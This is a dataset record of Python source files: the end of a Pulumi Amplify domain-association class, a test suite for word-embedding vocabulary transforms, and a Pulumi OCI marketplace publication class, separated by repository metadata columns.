        The Amazon Resource Name (ARN) for the domain association.
        """
        return pulumi.get(self, "arn")

    @property
    @pulumi.getter(name="certificateVerificationDnsRecord")
    def certificate_verification_dns_record(self) -> pulumi.Output[str]:
        """
        The DNS record for certificate verification.
        """
        return pulumi.get(self, "certificate_verification_dns_record")

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Output[str]:
        """
        The domain name for the domain association.
        """
        return pulumi.get(self, "domain_name")

    @property
    @pulumi.getter(name="subDomains")
    def sub_domains(self) -> pulumi.Output[Sequence['outputs.DomainAssociationSubDomain']]:
        """
        The setting for the subdomain. Documented below.
        """
        return pulumi.get(self, "sub_domains")

    @property
    @pulumi.getter(name="waitForVerification")
    def wait_for_verification(self) -> pulumi.Output[Optional[bool]]:
        """
        If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        return pulumi.get(self, "wait_for_verification")
| 44.504717
| 239
| 0.654531
| 2,111
| 18,870
| 5.597821
| 0.090005
| 0.0754
| 0.047389
| 0.037234
| 0.835407
| 0.81552
| 0.784125
| 0.76483
| 0.745621
| 0.728357
| 0
| 0.001334
| 0.245257
| 18,870
| 423
| 240
| 44.609929
| 0.828395
| 0.355432
| 0
| 0.580189
| 1
| 0
| 0.140665
| 0.07627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15566
| false
| 0.004717
| 0.033019
| 0
| 0.283019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e73086192b5cd9bb7f5688d015f2519a8fc4641
| 17,550
|
py
|
Python
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 416
|
2015-12-28T18:09:22.000Z
|
2022-03-22T07:46:35.000Z
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 55
|
2016-04-07T07:23:57.000Z
|
2021-01-04T14:09:03.000Z
|
web/tests/test_transform_words.py
|
zeyuyun1/word-embeddings-benchmarks
|
3586675b8fc5c83c615d8227e6a2eacab59a7b4f
|
[
"MIT"
] | 120
|
2016-04-14T00:42:28.000Z
|
2022-03-17T14:19:21.000Z
|
from web.embedding import Embedding
from web.vocabulary import *
import numpy as np
import logging
import sys
# COUNTEDVOCABULARY
def test_noinplace_transform_word_CountedVocabulary():
    """strip() merges ' cat ' into 'cat'; the higher-count entry wins and a new embedding is returned."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(word_count=[(' cat ', 10), ('cat', 50), ('dog', 60)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 2
    assert len(pe.vectors) == 2
    # 'dog'
    assert [0, 0, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 11])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
def test_noinplace_transform_word_prefer_occurences_CountedVocabulary():
    """When two surface forms collapse to one word, the entry with more occurrences is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(word_count=[(' cat ', 5), ('pikatchu ', 10), ('cat', 50), ('dog', 60), ('pikatchu', 200)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # 'dog'
    assert [0, 1, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    # pikatchu
    assert [0, 0, 1] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[0] == 'pikatchu'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    assert counts['pikatchu'] == 200
    # dog
    assert pe.vocabulary.words[1] == 'dog'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[2] == 'cat'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
def test_noinplace_transform_word_prefer_shortestword_CountedVocabulary():
    """On an occurrence tie (' pikatchu ' vs 'pikatchu', both 10), the shorter surface form is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(
        word_count=[('dog', 60), ('cat', 50), (' pikatchu ', 10), ('pikatchu', 10), (' cat ', 5)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 0, 1] in pe.vectors.tolist()
    # 'cat'
    assert [0, 1, 11] in pe.vectors.tolist()
    # pikatchu
    assert [0, 12, 13] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 12, 13])
    assert counts['pikatchu'] == 10
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
# ORDERDVOCABULARY
def test_noinplace_transform_word_OrderedVocabulary():
    """strip() merges ' cat' into 'cat' for an OrderedVocabulary; original order is preserved."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['dog', 'cat', ' cat'])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 2
    assert len(pe.vectors) == 2
    # 'dog'
    assert [0, 0, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 11])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
def test_noinplace_transform_word_prefer_occurences_OrderedVocabulary():
    """For OrderedVocabulary the earlier (higher-ranked) duplicate is the one kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['pikatchu', 'dog', 'cat', 'pikatchu ', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 1, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    # pikatchu
    assert [0, 0, 1] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[0] == 'pikatchu'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    # dog
    assert pe.vocabulary.words[1] == 'dog'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    # cat
    assert pe.vocabulary.words[2] == 'cat'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
def test_noinplace_transform_word_prefer_shortestword_OrderedVocabulary():
    """When ' pikatchu ' (earlier) and 'pikatchu' collapse, the shorter surface form's vector is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 0, 1] in pe.vectors.tolist()
    # 'cat'
    assert [0, 1, 11] in pe.vectors.tolist()
    # pikatchu
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
# VOCABULARY
def test_noinplace_transform_word_Vocabulary():
    """strip() merges ' cat ' into 'cat' for a plain Vocabulary."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = Vocabulary(words=['dog', 'cat', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 2
    assert len(pe.vectors) == 2
    # 'dog'
    assert [0, 0, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 11])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is Vocabulary
def test_noinplace_transform_word_prefer_shortest_ord1_Vocabulary():
    """'pikatchu ' appears first but the shorter 'pikatchu' (later) vector is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = Vocabulary(words=['pikatchu ', 'dog', 'cat', 'pikatchu', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 12, 13], [0, 1, 11], [0, 11, 12], [0, 0, 1], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 1, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    # pikatchu
    assert [0, 0, 1] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 0, 1])
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 1, 11])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is Vocabulary
def test_noinplace_transform_word_prefer_shortestword2_Vocabulary():
    """' pikatchu ' and 'pikatchu' collapse; the shorter form's vector is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = Vocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=False)
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 0, 1] in pe.vectors.tolist()
    # 'cat'
    assert [0, 1, 11] in pe.vectors.tolist()
    # pikatchu
    assert [0, 12, 13] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 12, 13])
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is Vocabulary
####################### inplace= True #######################
# COUNTEDVOCABULARY
def test_inplace_transform_word_CountedVocabulary():
    """In-place variant: transform_words returns the same Embedding object, mutated."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(word_count=[(' cat ', 10), ('cat', 50), ('dog', 60)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 2
    assert len(pe.vectors) == 2
    # 'dog'
    assert [0, 0, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 11])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
def test_inplace_transform_word_prefer_occurences_CountedVocabulary():
    """In-place variant: duplicates collapse and the higher-occurrence entries win."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(word_count=[(' cat ', 5), ('pikatchu ', 10), ('cat', 50), ('dog', 60), ('pikatchu', 200)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # 'dog'
    assert [0, 1, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    # pikatchu
    assert [0, 0, 1] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[0] == 'pikatchu'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    assert counts['pikatchu'] == 200
    # dog
    assert pe.vocabulary.words[1] == 'dog'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[2] == 'cat'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
def test_inplace_transform_word_prefer_shortestword_CountedVocabulary():
    """In-place variant: on an occurrence tie the shorter surface form is kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = CountedVocabulary(
        word_count=[('dog', 60), ('cat', 50), (' pikatchu ', 10), ('pikatchu', 10), (' cat ', 5)])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 0, 1] in pe.vectors.tolist()
    # 'cat'
    assert [0, 1, 11] in pe.vectors.tolist()
    # pikatchu
    assert [0, 12, 13] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    state = pe.vocabulary.getstate()
    counts = dict(zip(state[0], state[1]))
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 12, 13])
    assert counts['pikatchu'] == 10
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    assert counts['dog'] == 60
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    assert counts['cat'] == 50
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is CountedVocabulary
# ORDERDVOCABULARY
def test_inplace_transform_word_OrderedVocabulary():
    """In-place variant for OrderedVocabulary: same object returned, ' cat' merged into 'cat'."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['dog', 'cat', ' cat'])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 11], [0, 11, 12], [0, 12, 13]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 2
    assert len(pe.vectors) == 2
    # 'dog'
    assert [0, 0, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 11])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
def test_inplace_transform_word_prefer_occurences_OrderedVocabulary():
    """In-place variant: earlier (higher-ranked) duplicates win for OrderedVocabulary."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['pikatchu', 'dog', 'cat', 'pikatchu ', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 1, 11] in pe.vectors.tolist()
    # 'cat'
    assert [0, 11, 12] in pe.vectors.tolist()
    # pikatchu
    assert [0, 0, 1] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[0] == 'pikatchu'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    # dog
    assert pe.vocabulary.words[1] == 'dog'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    # cat
    assert pe.vocabulary.words[2] == 'cat'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
def test_inplace_transform_word_prefer_shortestword_OrderedVocabulary():
    """In-place variant: the shorter of ' pikatchu ' / 'pikatchu' is the entry kept."""
    logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
    cw = OrderedVocabulary(words=['dog', 'cat', ' pikatchu ', 'pikatchu', ' cat '])
    e = Embedding(vocabulary=cw, vectors=np.asanyarray([[0, 0, 1], [0, 1, 11], [0, 11, 12], [0, 12, 13], [0, 13, 14]]))
    pe = e.transform_words(lambda x: x.strip(), inplace=True)
    assert pe is e and pe == e
    assert len(pe.vocabulary) == 3
    assert len(pe.vectors) == 3
    # 'dog'
    assert [0, 0, 1] in pe.vectors.tolist()
    # 'cat'
    assert [0, 1, 11] in pe.vectors.tolist()
    # pikatchu
    assert [0, 11, 12] in pe.vectors.tolist()
    assert 'cat' in pe.vocabulary.words
    assert 'dog' in pe.vocabulary.words
    assert 'pikatchu' in pe.vocabulary.words
    # pikatchu
    assert pe.vocabulary.words[2] == 'pikatchu'
    assert np.array_equal(pe.vectors[2], [0, 11, 12])
    # dog
    assert pe.vocabulary.words[0] == 'dog'
    assert np.array_equal(pe.vectors[0], [0, 0, 1])
    # cat
    assert pe.vocabulary.words[1] == 'cat'
    assert np.array_equal(pe.vectors[1], [0, 1, 11])
    # exact-type check (not a subclass check), so identity is the right test
    assert type(pe.vocabulary) is OrderedVocabulary
| 30.20654
| 119
| 0.621425
| 2,566
| 17,550
| 4.194856
| 0.028449
| 0.12932
| 0.126347
| 0.063174
| 0.987644
| 0.985229
| 0.97566
| 0.974731
| 0.974452
| 0.974452
| 0
| 0.059785
| 0.205128
| 17,550
| 580
| 120
| 30.258621
| 0.711828
| 0.032764
| 0
| 0.919003
| 0
| 0
| 0.046137
| 0
| 0
| 0
| 0
| 0
| 0.707165
| 1
| 0.046729
| false
| 0
| 0.015576
| 0
| 0.062305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ebd52a1a99384cb10649ee6afe5de1a52fd3f8e
| 42,657
|
py
|
Python
|
sdk/python/pulumi_oci/marketplace/publication.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/marketplace/publication.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/marketplace/publication.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PublicationArgs', 'Publication']
@pulumi.input_type
class PublicationArgs:
    def __init__(__self__, *,
                 compartment_id: pulumi.Input[str],
                 is_agreement_acknowledged: pulumi.Input[bool],
                 listing_type: pulumi.Input[str],
                 package_details: pulumi.Input['PublicationPackageDetailsArgs'],
                 short_description: pulumi.Input[str],
                 support_contacts: pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]],
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 long_description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Publication resource.
        :param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
        :param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
        :param pulumi.Input[str] listing_type: In which catalog the listing should exist.
        :param pulumi.Input['PublicationPackageDetailsArgs'] package_details: A base object for the properties of the package
        :param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
        :param pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        :param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
        :param pulumi.Input[str] name: (Updatable) The name of the contact.
        """
        # Required arguments are stored unconditionally...
        pulumi.set(__self__, "compartment_id", compartment_id)
        pulumi.set(__self__, "is_agreement_acknowledged", is_agreement_acknowledged)
        pulumi.set(__self__, "listing_type", listing_type)
        pulumi.set(__self__, "package_details", package_details)
        pulumi.set(__self__, "short_description", short_description)
        pulumi.set(__self__, "support_contacts", support_contacts)
        # ...optional arguments only when explicitly provided, so unset values
        # are absent rather than present-as-None.
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if long_description is not None:
            pulumi.set(__self__, "long_description", long_description)
        if name is not None:
            pulumi.set(__self__, "name", name)
    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> pulumi.Input[str]:
        """
        (Updatable) The OCID of the compartment to create the resource within.
        """
        # Maps to the provider wire name "compartmentId".
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "compartment_id", value)
    @property
    @pulumi.getter(name="isAgreementAcknowledged")
    def is_agreement_acknowledged(self) -> pulumi.Input[bool]:
        """
        Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
        """
        # Maps to the provider wire name "isAgreementAcknowledged".
        return pulumi.get(self, "is_agreement_acknowledged")

    @is_agreement_acknowledged.setter
    def is_agreement_acknowledged(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_agreement_acknowledged", value)
    @property
    @pulumi.getter(name="listingType")
    def listing_type(self) -> pulumi.Input[str]:
        """
        In which catalog the listing should exist.
        """
        # Maps to the provider wire name "listingType".
        return pulumi.get(self, "listing_type")

    @listing_type.setter
    def listing_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "listing_type", value)
    @property
    @pulumi.getter(name="packageDetails")
    def package_details(self) -> pulumi.Input['PublicationPackageDetailsArgs']:
        """
        A base object for the properties of the package
        """
        # Maps to the provider wire name "packageDetails".
        return pulumi.get(self, "package_details")

    @package_details.setter
    def package_details(self, value: pulumi.Input['PublicationPackageDetailsArgs']):
        pulumi.set(self, "package_details", value)
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> pulumi.Input[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@short_description.setter
def short_description(self, value: pulumi.Input[str]):
pulumi.set(self, "short_description", value)
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@support_contacts.setter
def support_contacts(self, value: pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]):
pulumi.set(self, "support_contacts", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
